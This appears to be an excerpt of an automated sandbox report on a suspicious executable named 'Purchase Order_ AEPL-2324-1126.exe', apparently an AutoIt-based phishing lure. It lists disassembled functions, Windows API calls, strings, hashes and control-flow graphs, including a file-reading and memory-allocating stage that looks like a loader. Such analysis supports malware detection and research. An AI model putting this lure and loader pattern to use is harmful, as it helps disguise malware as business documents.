                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                  • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe$CMDLINE$CMDLINERAW
                                  • API String ID: 3948761352-3349250007
                                  • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                  • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                  • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                  • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                                  Function 00452719 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 147COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __fread_nolock$_fseek_wcscpy
                                  • String ID: D)E$D)E$FILE
                                  • API String ID: 3888824918-361185794
                                  • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                  • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                  • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                  • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                                  Function 0040E360 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                  • __wsplitpath.LIBCMT ref: 0040E41C
                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                  • _wcsncat.LIBCMT ref: 0040E433
                                  • __wmakepath.LIBCMT ref: 0040E44F
                                    • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                  • _wcscpy.LIBCMT ref: 0040E487
                                    • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                  • _wcscat.LIBCMT ref: 00427541
                                  • _wcslen.LIBCMT ref: 00427551
                                  • _wcslen.LIBCMT ref: 00427562
                                  • _wcscat.LIBCMT ref: 0042757C
                                  • _wcsncpy.LIBCMT ref: 004275BC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                  • String ID: Include$\
                                  • API String ID: 3173733714-3429789819
                                  • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                  • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                  • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                  • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                                  Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • _fseek.LIBCMT ref: 0045292B
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                    • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                    • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                  • __fread_nolock.LIBCMT ref: 00452961
                                  • __fread_nolock.LIBCMT ref: 00452971
                                  • __fread_nolock.LIBCMT ref: 0045298A
                                  • __fread_nolock.LIBCMT ref: 004529A5
                                  • _fseek.LIBCMT ref: 004529BF
                                  • _malloc.LIBCMT ref: 004529CA
                                  • _malloc.LIBCMT ref: 004529D6
                                  • __fread_nolock.LIBCMT ref: 004529E7
                                  • _free.LIBCMT ref: 00452A17
                                  • _free.LIBCMT ref: 00452A20
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                  • String ID:
                                  • API String ID: 1255752989-0
                                  • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                  • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                  • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                  • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                                  Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56registrywindowclipboardCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                  • RegisterClassExW.USER32(00000030), ref: 004104ED
                                  • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 004104FE
                                  • 6FD933E0.COMCTL32(004A90E8), ref: 0041051B
                                  • 6FDA2980.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                  • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                  • 6FD9C400.COMCTL32(00C368F0,000000FF,00000000), ref: 00410552
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Register$A2980BrushC400ClassClipboardColorD933FormatIconLoad
                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                  • API String ID: 793726766-1005189915
                                  • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                  • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                  • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                  • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                                  Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                  • LoadIconW.USER32(?,00000063), ref: 004103C0
                                  • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                  • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                  • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                  • RegisterClassExW.USER32(?), ref: 0041045D
                                    • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                    • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                    • Part of subcall function 00410490: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 004104FE
                                    • Part of subcall function 00410490: 6FD933E0.COMCTL32(004A90E8), ref: 0041051B
                                    • Part of subcall function 00410490: 6FDA2980.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                    • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                    • Part of subcall function 00410490: 6FD9C400.COMCTL32(00C368F0,000000FF,00000000), ref: 00410552
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Load$Icon$Register$BrushClassColor$A2980C400ClipboardCursorD933FormatImage
                                  • String ID: #$0$AutoIt v3
                                  • API String ID: 2372399384-4155596026
                                  • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                  • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                  • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                  • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                  Function 0040A780 Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _malloc
                                  • String ID: Default
                                  • API String ID: 1579825452-753088835
                                  • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                  • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                  • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                  • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                                  Function 0040F5C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 125COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2036 40f5c0-40f5cf call 422240 2039 40f5d0-40f5e8 2036->2039 2039->2039 2040 40f5ea-40f613 call 413650 call 410e60 2039->2040 2045 40f614-40f633 call 414d04 2040->2045 2048 40f691 2045->2048 2049 40f635-40f63c 2045->2049 2052 40f696-40f69c 2048->2052 2050 40f660-40f674 call 4150d1 2049->2050 2051 40f63e 2049->2051 2056 40f679-40f67c 2050->2056 2053 40f640 2051->2053 2055 40f642-40f650 2053->2055 2057 40f652-40f655 2055->2057 2058 40f67e-40f68c 2055->2058 2056->2045 2059 40f65b-40f65e 2057->2059 2060 425d1e-425d3e call 4150d1 call 414d04 2057->2060 2061 40f68e-40f68f 2058->2061 2062 40f69f-40f6ad 2058->2062 2059->2050 2059->2053 2073 425d43-425d5f call 414d30 2060->2073 2061->2057 2064 40f6b4-40f6c2 2062->2064 2065 40f6af-40f6b2 2062->2065 2067 425d16 2064->2067 2068 40f6c8-40f6d6 2064->2068 2065->2057 2067->2060 2069 425d05-425d0b 2068->2069 2070 40f6dc-40f6df 2068->2070 2069->2055 2072 425d11 2069->2072 2070->2057 2072->2067 2073->2052
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __fread_nolock_fseek_memmove_strcat
                                  • String ID: AU3!$EA06
                                  • API String ID: 1268643489-2658333250
                                  • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                  • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                  • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                  • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
                                  Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136timewindowregistryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2076 401100-401111 2077 401113-401119 2076->2077 2078 401179-401180 2076->2078 2080 401144-40114a 2077->2080 2081 40111b-40111e 2077->2081 2078->2077 2079 401182 2078->2079 2084 40112c-401141 742846C0 2079->2084 2082 401184-40118e call 401250 2080->2082 2083 40114c-40114f 2080->2083 2081->2080 2085 401120-401126 2081->2085 2093 401193-40119a 2082->2093 2087 401151-401157 2083->2087 2088 40119d 2083->2088 2085->2084 2086 42b038-42b03f 2085->2086 2086->2084 2092 42b045-42b059 call 401000 call 40e0c0 2086->2092 2090 401219-40121f 2087->2090 2091 40115d 2087->2091 2094 4011a3-4011a9 2088->2094 2095 42afb4-42afc5 call 40f190 2088->2095 2090->2085 2098 401225-42b06d call 468b0e 2090->2098 2096 401163-401166 2091->2096 2097 42b01d-42b024 2091->2097 2092->2084 2094->2085 2101 4011af 2094->2101 2095->2093 2105 42afe9-42b018 call 40f190 call 401a50 2096->2105 2106 40116c-401172 2096->2106 2097->2084 2104 42b02a-42b033 call 4370f4 2097->2104 2098->2093 2101->2085 2102 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2101->2102 2103 4011db-401202 SetTimer RegisterClipboardFormatW 2101->2103 2103->2093 2111 401204-401216 CreatePopupMenu 2103->2111 2104->2084 2105->2084 2106->2085 2113 401174-42afde call 45fd57 2106->2113 2113->2084 2127 42afe4 2113->2127 2127->2093
                                  APIs
                                  • 742846C0.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                  • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                  • PostQuitMessage.USER32(00000000), ref: 004011CB
                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                  • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 004011F0
                                  • CreatePopupMenu.USER32 ref: 00401204
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Timer$742846ClipboardCreateFormatKillMenuMessagePopupPostQuitRegister
                                  • String ID: TaskbarCreated
                                  • API String ID: 3785120505-2362178303
                                  • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                  • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                  • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                  • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                                  Function 004115D7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2128 4115d7-4115df 2129 4115ee-4115f9 call 4135bb 2128->2129 2132 4115e1-4115ec call 411988 2129->2132 2133 4115fb-4115fc 2129->2133 2132->2129 2136 4115fd-41160e 2132->2136 2137 411610-41163b call 417fc0 call 41130a 2136->2137 2138 41163c-411656 call 4180af call 418105 2136->2138 2137->2138
                                  APIs
                                  • _malloc.LIBCMT ref: 004115F1
                                    • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                    • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                    • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                  • std::exception::exception.LIBCMT ref: 00411626
                                  • std::exception::exception.LIBCMT ref: 00411640
                                  • __CxxThrowException@8.LIBCMT ref: 00411651
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                  • String ID: ,*H$4*H$@fI
                                  • API String ID: 615853336-1459471987
                                  • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                  • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                  • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                  • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                                  Function 04002670 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2147 4002670-400271e call 4000070 2150 4002725-400274b call 4003580 CreateFileW 2147->2150 2153 4002752-4002762 2150->2153 2154 400274d 2150->2154 2159 4002764 2153->2159 2160 4002769-4002783 VirtualAlloc 2153->2160 2155 400289d-40028a1 2154->2155 2157 40028e3-40028e6 2155->2157 2158 40028a3-40028a7 2155->2158 2161 40028e9-40028f0 2157->2161 2162 40028b3-40028b7 2158->2162 2163 40028a9-40028ac 2158->2163 2159->2155 2166 4002785 2160->2166 2167 400278a-40027a1 ReadFile 2160->2167 2168 40028f2-40028fd 2161->2168 2169 4002945-400295a 2161->2169 2164 40028c7-40028cb 2162->2164 2165 40028b9-40028c3 2162->2165 2163->2162 2172 40028db 2164->2172 2173 40028cd-40028d7 2164->2173 2165->2164 2166->2155 2174 40027a3 2167->2174 2175 40027a8-40027e8 VirtualAlloc 2167->2175 2176 4002901-400290d 2168->2176 2177 40028ff 2168->2177 2170 400296a-4002972 2169->2170 2171 400295c-4002967 VirtualFree 2169->2171 2171->2170 2172->2157 2173->2172 2174->2155 2178 40027ea 2175->2178 2179 40027ef-400280a call 40037d0 2175->2179 2180 4002921-400292d 2176->2180 2181 400290f-400291f 2176->2181 2177->2169 2178->2155 2187 4002815-400281f 2179->2187 2184 400293a-4002940 2180->2184 2185 400292f-4002938 2180->2185 2183 4002943 2181->2183 2183->2161 2184->2183 2185->2183 2188 4002821-4002850 call 40037d0 2187->2188 2189 4002852-4002866 call 40035e0 2187->2189 2188->2187 2195 4002868 2189->2195 2196 400286a-400286e 2189->2196 2195->2155 2197 4002870-4002874 CloseHandle 2196->2197 2198 400287a-400287e 2196->2198 2197->2198 2199 4002880-400288b VirtualFree 2198->2199 2200 400288e-4002897 2198->2200 2199->2200 2200->2150 2200->2155
                                  APIs
                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 04002741
                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 04002967
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1475151647.0000000004000000.00000040.00000020.00020000.00000000.sdmp, Offset: 04000000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_4000000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CreateFileFreeVirtual
                                  • String ID:
                                  • API String ID: 204039940-0
                                  • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                  • Instruction ID: d0f91887d61f9e09956ddd325c10b4b005c835883c3c1b741659b71ad14d7274
                                  • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                  • Instruction Fuzzy Hash: B1A10874E01209EBEB14DFA4C898BEEB7B5BF48304F208199E505BB2C0D775AE85CB55
                                  Function 004102B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2201 4102b0-4102c5 SHGetMalloc 2202 4102cb-4102da SHGetDesktopFolder 2201->2202 2203 425dfd-425e0e call 433244 2201->2203 2204 4102e0-41031a call 412fba 2202->2204 2205 41036b-410379 2202->2205 2213 410360-410368 2204->2213 2214 41031c-410331 SHGetPathFromIDListW 2204->2214 2205->2203 2211 41037f-410384 2205->2211 2213->2205 2215 410351-41035d 2214->2215 2216 410333-41034a call 412fba 2214->2216 2215->2213 2216->2215
                                  APIs
                                  • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                  • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
